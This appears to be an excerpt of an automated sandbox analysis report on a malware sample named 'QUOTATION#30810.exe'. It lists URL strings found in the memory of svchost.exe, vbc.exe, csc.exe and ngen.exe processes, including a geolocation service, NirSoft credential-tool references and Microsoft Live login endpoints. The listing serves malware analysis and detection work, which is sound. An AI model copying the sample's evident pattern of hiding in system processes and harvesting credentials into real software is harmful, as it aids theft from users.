                        Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
                        Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657217744.0000013DBB181000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                        Source: svchost.exe, 0000001F.00000003.1816023590.0000013DBB157000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, csc.exe, ngen.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: svchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, csc.exe, 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ngen.exe, 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpCt
                        Source: vbc.exe, 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                        Source: svchost.exe, 0000001F.00000003.1822570517.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                        Source: svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                        Source: svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80601
                        Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: svchost.exe, 0000001F.00000003.3655794001.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657125389.0000013DBB16F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: svchost.exe, 0000001F.00000003.3655978319.0000013DBB137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656004311.0000013DBB13A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656111087.0000013DBB141000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656988856.0000013DBB143000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3656046203.0000013DBB13D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trusten
                        Source: QUOTATION#30810.exe, 00000000.00000002.1595193809.000001FC802E0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1926724115.0000022707615000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.1861743412.000001E1DDC19000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.1955305299.000001D080075000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
                        Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                        Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                        Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                        Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                        Source: vbc.exe, 00000020.00000002.1858485035.0000000000EE4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                        Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=8
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502y0
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/i
                        Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                        Source: svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601=
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                        Source: svchost.exe, 0000001F.00000002.3658767257.0000013DBB66F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655631981.0000013DBA93B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf215
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=8
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf=
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf.com
                        Source: svchost.exe, 0000001F.00000003.1822188194.0000013DBA8EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                        Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                        Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.sf
                        Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                        Source: vbc.exe, 00000020.00000002.1858741639.000000000547F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                        Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                        Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                        Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrfre
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                        Source: svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
